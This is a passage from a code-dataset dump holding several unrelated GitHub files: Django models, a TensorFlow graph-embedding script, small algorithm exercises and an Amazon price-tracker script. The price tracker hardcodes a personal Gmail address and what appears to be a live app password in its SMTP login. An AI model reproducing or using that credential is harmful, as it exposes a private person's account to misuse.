'Bahrain'),\n ('Bangladesh', 'Bangladesh'),\n ('Barbados', 'Barbados'),\n ('Belarus', 'Belarus'),\n ('Belgium', 'Belgium'),\n ('Belize', 'Belize'),\n ('Benin', 'Benin'),\n ('Bhutan', 'Bhutan'),\n ('Bolivia', 'Bolivia'),\n ('Bosnia Herzegovina', 'Bosnia Herzegovina'),\n ('Botswana', 'Botswana'),\n ('Brazil', 'Brazil'),\n ('Brunei', 'Brunei'),\n ('Bulgaria', 'Bulgaria'),\n ('Burkina', 'Burkina'),\n ('Burundi', 'Burundi'),\n ('Cambodia', 'Cambodia'),\n ('Cameroon', 'Cameroon'),\n ('Canada', 'Canada'),\n ('Cape Verde', 'Cape Verde'),\n ('Central African Rep', 'Central African Rep'),\n ('Chad', 'Chad'),\n ('Chile', 'Chile'),\n ('China', 'China'),\n ('Colombia', 'Colombia'),\n ('Comoros', 'Comoros'),\n ('Congo', 'Congo'),\n ('Costa Rica', 'Costa Rica'),\n ('Croatia', 'Croatia'),\n ('Cuba', 'Cuba'),\n ('Cyprus', 'Cyprus'),\n ('Czech Republic', 'Czech Republic'),\n ('Denmark', 'Denmark'),\n ('Djibouti', 'Djibouti'),\n ('Dominica', 'Dominica'),\n ('Dominican Republic', 'Dominican Republic'),\n ('East Timor', 'East Timor'),\n ('Ecuador', 'Ecuador'),\n ('Egypt', 'Egypt'),\n ('El Salvador', 'El Salvador'),\n ('Equatorial Guinea', 'Equatorial Guinea'),\n ('Eritrea', 'Eritrea'),\n ('Estonia', 
'Estonia'),\n ('Ethiopia', 'Ethiopia'),\n ('Fiji', 'Fiji'),\n ('Finland', 'Finland'),\n ('France', 'France'),\n ('Gabon', 'Gabon'),\n ('Gambia', 'Gambia'),\n ('Georgia', 'Georgia'),\n ('Germany', 'Germany'),\n ('Ghana', 'Ghana'),\n ('Greece', 'Greece'),\n ('Grenada', 'Grenada'),\n ('Guatemala', 'Guatemala'),\n ('Guinea', 'Guinea'),\n ('Guyana', 'Guyana'),\n ('Haiti', 'Haiti'),\n ('Honduras', 'Honduras'),\n ('Hungary', 'Hungary'),\n ('Iceland', 'Iceland'),\n ('India', 'India'),\n ('Indonesia', 'Indonesia'),\n ('Iran', 'Iran'),\n ('Iraq', 'Iraq'),\n ('Ireland', 'Ireland'),\n ('Israel', 'Israel'),\n ('Italy', 'Italy'),\n ('Ivory Coast', 'Ivory Coast'),\n ('Jamaica', 'Jamaica'),\n ('Japan', 'Japan'),\n ('Jordan', 'Jordan'),\n ('Kazakhstan', 'Kazakhstan'),\n ('Kenya', 'Kenya'),\n ('Kiribati', 'Kiribati'),\n ('Korea North', 'Korea North'),\n ('Korea South', 'Korea South'),\n ('Kosovo', 'Kosovo'),\n ('Kuwait', 'Kuwait'),\n ('Kyrgyzstan', 'Kyrgyzstan'),\n ('Laos', 'Laos'),\n ('Latvia', 'Latvia'),\n ('Lebanon', 'Lebanon'),\n ('Lesotho', 'Lesotho'),\n ('Liberia', 'Liberia'),\n ('Libya', 'Libya'),\n ('Liechtenstein', 'Liechtenstein'),\n ('Lithuania', 'Lithuania'),\n ('Luxembourg', 'Luxembourg'),\n ('Macedonia', 'Macedonia'),\n ('Madagascar', 'Madagascar'),\n ('Malawi', 'Malawi'),\n ('Malaysia', 'Malaysia'),\n ('Maldives', 'Maldives'),\n ('Mali', 'Mali'),\n ('Malta', 'Malta'),\n ('Marshall Islands', 'Marshall Islands'),\n ('Mauritania', 'Mauritania'),\n ('Mauritius', 'Mauritius'),\n ('Mexico', 'Mexico'),\n ('Micronesia', 'Micronesia'),\n ('Moldova', 'Moldova'),\n ('Monaco', 'Monaco'),\n ('Mongolia', 'Mongolia'),\n ('Montenegro', 'Montenegro'),\n ('Morocco', 'Morocco'),\n ('Mozambique', 'Mozambique'),\n ('Myanmar', 'Myanmar'),\n ('Namibia', 'Namibia'),\n ('Nauru', 'Nauru'),\n ('Nepal', 'Nepal'),\n ('Netherlands', 'Netherlands'),\n ('New Zealand', 'New Zealand'),\n ('Nicaragua', 'Nicaragua'),\n ('Niger', 'Niger'),\n ('Nigeria', 'Nigeria'),\n ('Norway', 'Norway'),\n ('Oman', 'Oman'),\n ('Pakistan', 'Pakistan'),\n ('Palau', 'Palau'),\n ('Panama', 'Panama'),\n ('Papua New Guinea', 'Papua New Guinea'),\n ('Paraguay', 'Paraguay'),\n ('Peru', 'Peru'),\n ('Philippines', 'Philippines'),\n ('Poland', 'Poland'),\n ('Portugal', 'Portugal'),\n ('Qatar', 'Qatar'),\n ('Russian Federation', 'Russian Federation'),\n ('Rwanda', 'Rwanda'),\n ('St Lucia', 'St Lucia'),\n ('Samoa', 'Samoa'),\n ('San Marino', 'San Marino'),\n ('Saudi Arabia', 'Saudi Arabia'),\n ('Senegal', 'Senegal'),\n ('Serbia', 'Serbia'),\n ('Seychelles', 'Seychelles'),\n ('Sierra Leone', 'Sierra Leone'),\n ('Singapore', 'Singapore'),\n ('Slovakia', 'Slovakia'),\n ('Slovenia', 'Slovenia'),\n ('Solomon Islands', 'Solomon Islands'),\n ('Somalia', 'Somalia'),\n ('South Africa', 'South Africa'),\n ('South Sudan', 'South Sudan'),\n ('Spain', 'Spain'),\n ('Sri Lanka', 'Sri Lanka'),\n ('Sudan', 'Sudan'),\n ('Suriname', 'Suriname'),\n ('Swaziland', 'Swaziland'),\n ('Sweden', 'Sweden'),\n ('Switzerland', 'Switzerland'),\n ('Syria', 'Syria'),\n ('Taiwan', 'Taiwan'),\n ('Tajikistan', 'Tajikistan'),\n ('Tanzania', 'Tanzania'),\n ('Thailand', 'Thailand'),\n ('Togo', 'Togo'),\n ('Tonga', 'Tonga'),\n ('Tunisia', 'Tunisia'),\n ('Turkey', 'Turkey'),\n ('Turkmenistan', 'Turkmenistan'),\n ('Tuvalu', 'Tuvalu'),\n ('Uganda', 'Uganda'),\n ('Ukraine', 'Ukraine'),\n ('United Arab Emirates', 'United Arab Emirates'),\n ('United Kingdom', 'United Kingdom'),\n ('Uruguay', 'Uruguay'),\n ('Uzbekistan', 'Uzbekistan'),\n ('Vanuatu', 'Vanuatu'),\n ('Vatican City', 'Vatican City'),\n 
('Venezuela', 'Venezuela'),\n        ('Vietnam', 'Vietnam'),\n        ('Yemen', 'Yemen'),\n        ('Zambia', 'Zambia'),\n        ('Zimbabwe', 'Zimbabwe'),\n    )\n\n    user = models.OneToOneField(settings.AUTH_USER_MODEL)\n    title = models.CharField(max_length=64, choices=TITLE_CHOICES, default='Dr')\n    phone = models.CharField(max_length=64, default='')\n    country = models.CharField(max_length=64, choices=COUNTRY_CHOICES, default='Romania')\n    affiliation = models.CharField(max_length=64, default='')\n\n    def __str__(self):\n        return \"Profile of user: {}\".format(self.user.username)\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, instance, created, **kwargs):\n    \"\"\"\n    Ensure that every new user gets a profile.\n    \"\"\"\n    if created:\n        Profile.objects.create(user=instance)","repo_name":"dnutiu/acrevista","sub_path":"account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"14192234526","text":"\"\"\"\n\nauthor: Vachik Dave\n\n\"\"\"\n\nimport sys;\nimport networkx as nx;\nimport math;\nimport random;\nimport numpy as np;\nimport tensorflow as tf;\nfrom collections import defaultdict;\nimport argparse;\nimport time;\n\n\nedge2instance = {};\nprev_edge_times = [];\n\ndef load_graphlet_data(filename,G,train_start):\n\t\"\"\"\n\tread graphlet frequency vectors from file\n\t\"\"\"\n\tglobal prev_edge_times;\n\tglobal edge2instance;\n\tf = open(filename);\n\tindex = 0;\n\tX = [];\n\tY = [];\n\tuv_list = [];\n\tdim = 0;\n\tcount = 0;\n\tfor line in f:\n\t\tif index == 0:\n\t\t\tdim = len(line.strip().split(\",\")) - 4;\t\t\t\t# node1,node2,interval_time,event_indicator,features...\n\t\t\tindex += 1;\n\t\t\tcontinue;\n\t\tline = line.strip().split(\",\");\n\t\tif line[3] == '0':\t\t\t\t\t\t\t#if event_indicator is false ignore the instance\n\t\t\tcontinue;\n\n\t\tu = int(line[0]);\n\t\tv = int(line[1]);\n\t\tif v < u:\n\t\t\ttmp = u;\n\t\t\tu = v;\n\t\t\tv = tmp;\n\n\n\t\ty = int(line[2]);\n\t\tsecond_edge_time = 0;\n\t\tif train_start > 0:\t\t\t\t\t\t# training case\n\t\t\ttime = G[u][v]['time'];\n\t\t\tsecond_edge_time = time - y;\n\t\t\tif train_start > second_edge_time:\n\t\t\t\tcontinue;\n\t\telse:\t\t\t\t\t\t\t\t# testing\n\t\t\ttime = G[u][v]['time'];\n\t\t\tsecond_edge_time = time - y;\n\n\t\t\tif (u,v) in edge2instance:\t\t\t\t# stores instance indexes(count is current index and also count)\n\t\t\t\tedge2instance[(u,v)].append(count);\n\t\t\telse:\n\t\t\t\tedge2instance[(u,v)] = [count];\n\n\t\t\tcount += 1;\n\n\t\t\tprev_edge_times.append(second_edge_time);\n\n\n\t\tx = list(map(float,line[4:]));\n\t\tmax_x = max(x);\n\t\tnew_x = x;\n\t\tif max_x != 0:\n\t\t\tnew_x = [each/max_x for each in x];\n\t\tY.append(y);\n\t\tX.append(new_x);\n\t\tuv_list.append([u,v]);\n\n\tif train_start > 0 and count != len(Y):\n\t\tprint(\"size mis-match for test!!!\");\n\n\treturn uv_list,X,Y,dim;\n\n\ndef load_data(filename):\n\t\"\"\"\n\tread graph from file\n\t\"\"\"\n\tG = nx.Graph()\n\tmax_T = -1;\n\tmax_id = -1;\n\tindex = -1;\n\twith open(filename, 'r') as f:\n\t\tfor line in f:\n\t\t\tindex += 1;\n\t\t\tif index == 0:\n\t\t\t\tcontinue;\n\t\t\tlinetuple = line.strip().split()\n\t\t\tu = int(linetuple[0]);\n\t\t\tv = int(linetuple[1]);\n\t\t\tt = int(linetuple[2]);\n\t\t\tG.add_edge(u,v)\n\t\t\tG[u][v]['time'] = t;\n\t\t\tmax_id = max(u, max_id)\n\t\t\tmax_id = max(v, max_id)\n\t\t\tmax_T = max(t,max_T);\n\t#print(max_id);\n\treturn max_id, max_T, G; \n\n\n\ndef 
generate_train_batch(G, uv_list,train_x,train_y, batch_size):\n\t\"\"\"\n\tgenerate batch of edge pairs <(u,v),(x,y)> where y_uv >= y_xy\n\t\"\"\"\n\tidxs1 = np.random.choice(len(train_y),batch_size);\n\tidxs2 = np.random.choice(len(train_y),batch_size);\n\tbatch_Ydiff = [];\n\tN = len(G);\n\tbatch_X = [];\n\tfor i in range(batch_size):\n\t\ttpl = [];\n\t\tif train_y[idxs1[i]] >= train_y[idxs2[i]]:\n\t\t\tbatch_Ydiff.append(train_y[idxs1[i]] - train_y[idxs2[i]]);\n\t\t\ttpl.append(uv_list[idxs1[i]][0]);\n\t\t\ttpl.append(uv_list[idxs1[i]][1]);\n\t\t\ttpl.append(uv_list[idxs2[i]][0]);\n\t\t\ttpl.append(uv_list[idxs2[i]][1]);\n\t\telse:\n\t\t\tbatch_Ydiff.append(train_y[idxs2[i]] - train_y[idxs1[i]]);\n\t\t\ttpl.append(uv_list[idxs2[i]][0]);\n\t\t\ttpl.append(uv_list[idxs2[i]][1]);\n\t\t\ttpl.append(uv_list[idxs1[i]][0]);\n\t\t\ttpl.append(uv_list[idxs1[i]][1]);\n\n\t\tbatch_X.append(tpl);\n\n\treturn np.array(batch_X),np.array(batch_Ydiff)\n\ndef tctp_tf(N, hidden_dim, regulation_rate, learning_rate):\n\t\"\"\"\n\tbuild computational graph for time-preserving margin loss.\n\t\"\"\"\n\tx1 = tf.placeholder(tf.int32, [None])\n\tx2 = tf.placeholder(tf.int32, [None])\n\tx3 = tf.placeholder(tf.int32, [None])\n\tx4 = tf.placeholder(tf.int32, [None])\n\ty_diff = tf.placeholder(tf.float64,[None])\n\n\temb_mat = tf.Variable(tf.random_normal([N+1, hidden_dim], stddev = 0.1,dtype=tf.float64), name = \"emb\")\n\n\tx1_emb = tf.nn.embedding_lookup(emb_mat, x1)\n\tx2_emb = tf.nn.embedding_lookup(emb_mat, x2)\n\tx3_emb = tf.nn.embedding_lookup(emb_mat, x3)\n\tx4_emb = tf.nn.embedding_lookup(emb_mat, x4)\n\n\tl2_norm = tf.add_n([\n\t\ttf.reduce_sum(tf.multiply(x1_emb, x1_emb)),\n\t\ttf.reduce_sum(tf.multiply(x2_emb, x2_emb)),\n\t\ttf.reduce_sum(tf.multiply(x3_emb, x3_emb)),\n\t\ttf.reduce_sum(tf.multiply(x4_emb, x4_emb))\n\t\t])\n\t\n\te1_dist = tf.norm(x1_emb-x2_emb,ord = 2, axis = 1);\n\te2_dist = tf.norm(x3_emb-x4_emb,ord = 2, axis = 1);\n\n\trelative_diff = (e1_dist - e2_dist) #/ (y_diff+1.0);\n\tmargin_multiplier = 0.01;\t\t\t\t\t# scale factor\n\tmargin_threshold = y_diff * margin_multiplier; \n\tobj = tf.reduce_mean(tf.nn.relu(margin_threshold - relative_diff ));\n\n\tmy_loss = regulation_rate * l2_norm + obj;\n\n\ttrain_op = tf.train.AdagradOptimizer(learning_rate).minimize(my_loss)\n\n\treturn x1, x2, x3, x4, y_diff, obj, my_loss, train_op, emb_mat;\n\n\ndef run_node_emb(N, T, G, uv_list,train_x,train_y, emb_filename,hidden_dim, regulation_rate, learning_rate, epochs, batch_size = 100):\n\t\"\"\"\n\trunning the tensorflow computational graph\n\t\"\"\"\n\tnum_iteration = int( float(len(train_y)) / float(batch_size) );\n\twith tf.Session() as session:\n\t\tx1, x2, x3, x4, y_diff, obj, my_loss, train_op, emb_mat = \\\n\t\t tctp_tf(N, hidden_dim, regulation_rate, learning_rate)\n\t\tprint('construct tensorflow computational graph: Done!');\n\t\tsession.run(tf.global_variables_initializer())\n\n\t\tfor epoch in range(epochs):\n\t\t\t_batch_loss = 0\n\t\t\tfor k in range(0, num_iteration): \n\t\t\t\tbatch_X, batch_Y = generate_train_batch(G,uv_list,train_x,train_y,batch_size);\n\t\t\t\t_loss, _train_opt = session.run([my_loss, train_op], \\\n\t\t\t\t\t\t\t feed_dict={x1:batch_X[:,0],x2:batch_X[:,1], x3:batch_X[:,2], \\\n\t\t\t\t\t\t\t\tx4:batch_X[:,3], y_diff:batch_Y[:]})\n\t\t\t\t_batch_loss += _loss\n\n\t\t\tprint(\"epoch: \", epoch);\n\t\t\tprint(\"my_loss: \", _batch_loss / float(num_iteration));\n\n\t\tfinal_emb_mat = session.run(emb_mat)\n\t\t#emb_filename = 
\"bpr_emb_\"+str(hidden_dim)+\"_\"+str(regulation_rate)+\"_\"+str(learning_rate)+\"_\"+str(epochs)+\".txt\"\n\t\tsave_embedding(emb_filename,final_emb_mat);\n\n\t\treturn final_emb_mat;\n\n\ndef save_embedding(filename,emb):\n\tf = open(filename,'w');\n\tN,dim = np.array(emb).shape;\n\tf.write(str(N)+\",\"+str(dim));\n\tindex = 0;\n\tfor row in emb:\n\t\tf.write(\"\\n\"+str(index));\n\t\tindex += 1;\n\t\tfor ele in row:\n\t\t\tf.write(\",\"+str(ele));\n\tf.close();\n\n\ndef parse_args():\n\t\"\"\"\n\tparse the embedding model arguments\n\t\"\"\"\n\tparser_arg = argparse.ArgumentParser(description = \"Time-preserving node embedding.\")\n\t\n\tparser_arg.add_argument('filename', type = str, default = '', help = 'embedding graph filename')\n\tparser_arg.add_argument('train_graphlet_filename', type = str, default = '', help = 'Training graphlet freq filename')\n\tparser_arg.add_argument('hidden_dim', type = int, default = 20, help = 'number of dimension')\n\tparser_arg.add_argument('regulation_rate', type = float, default = 0.0001, help = 'matrix regularization parameter')\n\tparser_arg.add_argument('learning_rate', type = float, default = 0.01, help = 'learning rate during min-batch gradient descent')\n\tparser_arg.add_argument('epochs', type = int, default = 20, help = 'epochs')\n#\tparser_arg.add_argument('batch_size', type = int, default = 100, help = 'min-batch size')\n\n\treturn parser_arg.parse_args()\n\n\ndef main(args):\n\tstart_time = time.time();\n\tN, T, G = load_data(args.filename);\n\tprint('reading graphs: Done!')\n\tprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time));\n\tsys.stdout.flush();\t\n\ttrain_start = int(T*0.1);\n\tuv_list,train_x,train_y,dim1 = load_graphlet_data(args.train_graphlet_filename,G,train_start);\n\n\temb_filename = sys.argv[1].strip().rsplit(\"_\",2)[0].split(\"/\")[-1];\n\temb_filename += \"_NodeEmb_\";\n\temb_filename += str(args.hidden_dim);\n\temb_filename += \"D_\";\n\temb_filename += str(args.learning_rate);\n\temb_filename += \"_\";\n\temb_filename += str(args.regulation_rate);\n\temb_filename += \"_\";\n\temb_filename += str(args.epochs);\n\temb_filename += \".txt\";\n\n\tprint(\"learning_rate: \"+str(args.learning_rate));\n\tprint(\"regulation_rate: \"+str(args.regulation_rate));\n\n\tstart_time = time.time();\n\tnode_emb = run_node_emb(N, T, G, uv_list,train_x,train_y, emb_filename,args.hidden_dim, args.regulation_rate,args.learning_rate, args.epochs)\n\tprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time));\n\n\treturn node_emb;\n\nif __name__ == '__main__':\n\targs = parse_args()\n\tmain(args)\n","repo_name":"Vachik-Dave/GraNiTE_solving_triangle_completion_time_prediction","sub_path":"node_emb_tctp.py","file_name":"node_emb_tctp.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29975497358","text":"# This is an example VISAN script for the MIP_NL__2P product\n\n# Make sure to set the 'products-file directory' option in the VISAN Preferences panel to\n# a directory containing MIP_NL__2P products.\n\n# This example will then take all products it finds in this directory and\n# for these products plot the ozone profiles\n\n\ndef run():\n\n import glob\n import wx\n\n productdir = str(wx.Config.Get().Read('DirectoryLocation/Products'))\n\n # Use glob to find all files in productdir starting with 'MIP_NL__2P'\n files = glob.glob(os.path.join(productdir, \"MIP_NL__2P*\"))\n if len(files) == 0:\n print((\"Could not find 
any MIP_NL__2P files in directory '\" + productdir + \"'\"))\n        return\n\n    # When we exclude altitude (but still include pressure), the plot command will use pressure for the y-axis\n    # By providing a minimum value for the O3 vmr we also automatically filter out all NaN values\n    o3 = harp.import_product(files[0], \"exclude(altitude);O3_volume_mixing_ratio>=0\", \"species=O3\")\n\n    window = plot(o3, ylabel=\"p [hPa]\", xmin=0, title=\"MIP_NL__2P profile example (o3)\")\n\n\nrun()\n","repo_name":"stcorp/visan","sub_path":"visan/examples/MIP_NL__2P_profile.py","file_name":"MIP_NL__2P_profile.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"34436660738","text":"from pydoc import classname\nimport requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\nURL = \"https://www.amazon.in/Croma-Lithium-Polymer-Charging-CRSP10kPBA258901/dp/B09Z2XC3RG/ref=sr_1_2_sspa?crid=1UO9ZIVPVA6TP&keywords=power+bank+10000mah&qid=1654920455&sprefix=power%2Caps%2C1009&sr=8-2-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE2RUlJQzhEQkdRUVcmZW5jcnlwdGVkSWQ9QTAzNzU4MTUyTUk5SzVNWFg2Ulo1JmVuY3J5cHRlZEFkSWQ9QTA1Mjg4OTA1NjEyRkdJRE5YRk4md2lkZ2V0TmFtZT1zcF9hdGYmYWN0aW9uPWNsaWNrUmVkaXJlY3QmZG9Ob3RMb2dDbGljaz10cnVl\"\n# to find your user agent, search Google for: my user agent\nheaders = {\"user-agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}\ndef check_price():\n    page = requests.get(URL,headers=headers)\n    soup = BeautifulSoup(page.content,\"html.parser\")\n    title = soup.find(id=\"title\").get_text()\n    price = soup.find(class_=\"a-price-whole\").get_text()\n    converted_price = int(price[0:3])\n    print(converted_price)\n    if(converted_price >= 500):\n        print(\"should send an email\")\n        send_email(title) \n\ndef send_email(title):\n    server = smtplib.SMTP(\"smtp.gmail.com\",587)\n    server.ehlo()\n    server.starttls()\n    server.ehlo()\n    server.login(\"pokhrelanmol90@gmail.com\",\"jwdojicnjzujseal\")\n    subject = f\"Price fell down for {title} \"\n    body = f'Check the amazon link {URL} '\n    msg = f\"Subject:{subject}\\n\\n{body}\"\n    server.sendmail(\n        \"pokhrelanmol90@gmail.com\",\n        \"anmolpokhrel46@gmail.com\",\n        msg\n    )\n    print(\"Email sent successfully\")\n    server.quit()\n\nwhile True:\n    check_price()\n    time.sleep(3600*24)","repo_name":"pokhrelanmol/amazon-price-tracker-python","sub_path":"amazon_price_tracker.py","file_name":"amazon_price_tracker.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3271765204","text":"import pygame\n\nWIN_WIDTH = 1000\nWIN_HEIGHT = 1000\nTILESIZE = 32\nFPS = 60\n\nPLAYER_LAYER = 4\nENEMY_LAYER = 3\nBLOCK_LAYER = 2\nGROUND_LAYER = 1\n\nPLAYER_SPEED = 2\nENEMY_SPEED = 1\n\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\nWHITE = (255, 255, 255)\n\nPLAYER_HIT_RECT = pygame.Rect(0, 0, 35, 35)\n\nLOCATIONS = {\n    'lobby': 'map_sprites2/map1.tmx',\n    'dungeon': 'map_sprites2/map_indoors.tmx',\n    'forest': 'map_sprites(forest)/forest.tmx'\n}\n","repo_name":"Irishery/Amazing_game","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39614055314","text":"from django.utils.translation import gettext_lazy as _\n\n\nCONTENT_TYPES = (\n    # Configuration of content 
names\n # name Type ID (unique and uppercase)\n # verbose_name User-friendly type name\n # verbose_name_plural User-friendly pluralized type name\n # category_name User-friendly category name which contains this content\n # requires_validation Boolean; whether this content has to be validated before publication\n # single_container Boolean; True if the content is a single container\n # beta Boolean; True if the content can be in beta\n {\n \"name\": \"TUTORIAL\",\n \"verbose_name\": \"tutoriel\",\n \"verbose_name_plural\": \"tutoriels\",\n \"category_name\": \"tutoriel\",\n \"requires_validation\": True,\n \"single_container\": False,\n \"beta\": True,\n },\n {\n \"name\": \"ARTICLE\",\n \"verbose_name\": \"article\",\n \"verbose_name_plural\": \"articles\",\n \"category_name\": \"article\",\n \"requires_validation\": True,\n \"single_container\": True,\n \"beta\": True,\n },\n {\n \"name\": \"OPINION\",\n \"verbose_name\": \"billet\",\n \"verbose_name_plural\": \"billets\",\n \"category_name\": \"tribune\",\n \"requires_validation\": False,\n \"single_container\": True,\n \"beta\": False,\n },\n)\n\nPICK_OPERATIONS = (\n (\"REJECT\", _(\"Rejeté\")),\n (\"NO_PICK\", _(\"Non choisi\")),\n (\"PICK\", _(\"Choisi\")),\n (\"REMOVE_PUB\", _(\"Dépublier définitivement\")),\n)\n\n# a list of contents which have to be validated before publication\nCONTENT_TYPES_REQUIRING_VALIDATION = [content[\"name\"] for content in CONTENT_TYPES if content[\"requires_validation\"]]\n\n# a list of contents which have one big container containing at least one small container\nSINGLE_CONTAINER_CONTENT_TYPES = [content[\"name\"] for content in CONTENT_TYPES if content[\"single_container\"]]\n\n# a list of contents which can be in beta\nCONTENT_TYPES_BETA = [content[\"name\"] for content in CONTENT_TYPES if content[\"beta\"]]\n\nTYPE_CHOICES = [(content[\"name\"], content[\"verbose_name\"].capitalize()) for content in CONTENT_TYPES]\n\n# a single list with all types\nCONTENT_TYPE_LIST = [type_[0] for type_ in TYPE_CHOICES]\n\nTYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n\nSTATUS_CHOICES = (\n (\"PENDING\", _(\"En attente d'un validateur\")),\n (\"PENDING_V\", _(\"En cours de validation\")),\n (\"ACCEPT\", _(\"Publié\")),\n (\"REJECT\", _(\"Rejeté\")),\n (\"CANCEL\", _(\"Annulé\")),\n)\n","repo_name":"zestedesavoir/zds-site","sub_path":"zds/tutorialv2/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"61"} +{"seq_id":"40562565392","text":"def lis_til(A, i):\n if i == 0: # only 1 element\n return 1\n answer = 1\n for j in reversed(range(i)):\n if A[j] < A[i]:\n answer = max(answer, 1 + lis_til(A, j))\n return answer\n\ndef lis_recursive(A):\n answer = 1\n for i in range(len(A)):\n answer = max(answer, lis_til(A, i))\n return answer\n\ndef lis_memoized(A):\n answer = 1\n cache = {0: 1}\n for i in range(len(A)):\n answer = max(answer, lis_til_memoized(A, i, cache))\n return answer\n\ndef lis_til_memoized(A, i: int, cache):\n if i in cache:\n return cache[i]\n answer = 1\n for j in reversed(range(i)):\n if A[j] < A[i]:\n answer = max(answer, 1 + lis_til_memoized(A, j, cache))\n cache[i] = answer\n return answer\n\ndef lis_dp(A):\n lis_til = [1] * len(A)\n answer = 1\n highest_index = -1\n for i in range(1, len(A)):\n highest = 1\n for j in range(i-1, -1, -1):\n if A[j] < A[i]:\n highest = max(highest, 1 + lis_til[j])\n lis_til[i] = highest\n if lis_til[i] > answer:\n highest_index = i\n answer = 
max(lis_til[i], answer)\n\n # Construct the longest increasing sequence\n lis_seq = [A[highest_index]]\n credit = lis_til[highest_index]\n for j in range(highest_index-1, -1, -1):\n if lis_til[j] == credit - 1:\n lis_seq.insert(0, A[j])\n credit -= 1\n\n print(\"Input: %s, Highest index: %s, LIS: %s, Len: %s\" % (A, highest_index, lis_seq, len(lis_seq)))\n return answer\n\n\nfourteen =[ 64, 34, 56, 73, 52, 75, 51, 2, 78, 14, 10, 74, 36, 32, 31, 32, 87, 36, 4, 66, 89, 47, 12, 53, 9, 73, 34, 92, 34, 87, 1, 28, 24, 46, 92, 27, 1, 13, 75, 46, 4, 74, 93, 76, 56, 31, 42, 65, 58, 84, 61, 18, 59, 89, 29, 96, 101, 42, 95, 28, 65, 48, 51, 51, 18, 90, 43, 75, 22, 87, 100, 80, 14, 13, 78, 55, 78, 18, 25, 53, 88, 8, 9, 16, 86, 18 ]\n\ndef test_basic(method):\n assert method([1, 2, 3]) == 3, \"%s([1, 2, 3]) should return 3\" % (method.__name__)\n assert method([1, 2, 1, 5]) == 3, \"%s([1, 2, 1, 5]) should return 3\" % (method.__name__)\n assert method(fourteen) == 14, \"%s(%s) should return 14\" % (method.__name__, fourteen)\n\nif __name__ == \"__main__\":\n test_basic(lis_recursive)\n test_basic(lis_memoized)\n test_basic(lis_dp)\n print(\"Everything passed\")\n","repo_name":"samos123/algos","sub_path":"lis.py","file_name":"lis.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32198884577","text":"\ndef is_armstrong(number):\n # defining total\n total = 0\n\n # cloning number\n duplicate = number\n\n # looping till duplicate != 0\n while duplicate != 0:\n total += (duplicate % 10) ** 3\n duplicate //= 10\n\n # returns true if sum of cube of digits is equal to original number\n return total == number\n","repo_name":"Meg2tron/python-1","sub_path":"code/armstrong_number/armstrong_number.py","file_name":"armstrong_number.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10417432844","text":"# pylint: disable=too-few-public-methods\n\"\"\"Word module\n\"\"\"\n\n\nclass Word:\n \"\"\"Word class\n \"\"\"\n def __init__(self):\n self.index = None\n self.name = None\n self.enum = {\n \"min_two\": None,\n \"min_one\": None,\n \"self\": None,\n \"plus_one\": None,\n \"plus_two\": None,\n \"plus_three\": None}\n","repo_name":"ThomasPiergiovanni/oc_p7","sub_path":"grandpy/parser/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"958491571","text":"import pandas as pd\nimport os, sys\nimport logging\nimport datetime\nimport time\n\n\nab_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../python_scripts'))\nsys.path.append(ab_path)\n\n# Defined Libraries\nfrom dataFetcher import DataFetcher # Import DataFetcher class\nfrom paths_logging import PathManager # Import create_xl_folder_path function\nfrom initializeVariables import InitVars # Import initializeVariables class\n\nclass DataProcessor:\n\n def __init__(self):\n self.path_manager = PathManager()\n self.dataFetcher = DataFetcher()\n self.init_vars = InitVars()\n\n\n def export_to_excel(self, df, filename, expiry_date):\n xl_folder_path = self.path_manager.create_xl_folder_path()\n try:\n # Create the full file path\n name = f\"{filename}_{expiry_date}.xlsx\"\n file_path = os.path.join(xl_folder_path, name)\n\n # Check if the Excel file already exists\n if os.path.exists(file_path):\n existing_data = 
pd.read_excel(file_path)\n df = pd.concat([df, existing_data], ignore_index=True)\n df.to_excel(file_path, index=False)\n # print(f\"Data appended to existing {filename}_{expiry_date}.xlsx successfully!\")\n # logging.info(\"Data appended to existing %s successfully!\", file_path)\n else:\n # Export dataframe to Excel\n df.to_excel(file_path, index=False)\n # print(f\"Data appended to {filename}_{expiry_date}.xlsx successfully!\")\n # logging.info(\"Data appended to %s successfully!\", file_path)\n except Exception as e:\n print(\"Error exporting data to Excel:\", e)\n logging.error(\"Error exporting data to Excel: %s\", e)\n\n\n\n def fetch_and_process_data(self, exp_date):\n print(\"Fetching and processing data for\", exp_date, \"at\", datetime.datetime.now().replace(microsecond=0))\n logging.info(\"Fetching and processing data for %s\", exp_date)\n\n # Nifty data\n logging.info(\"Fetching Nifty 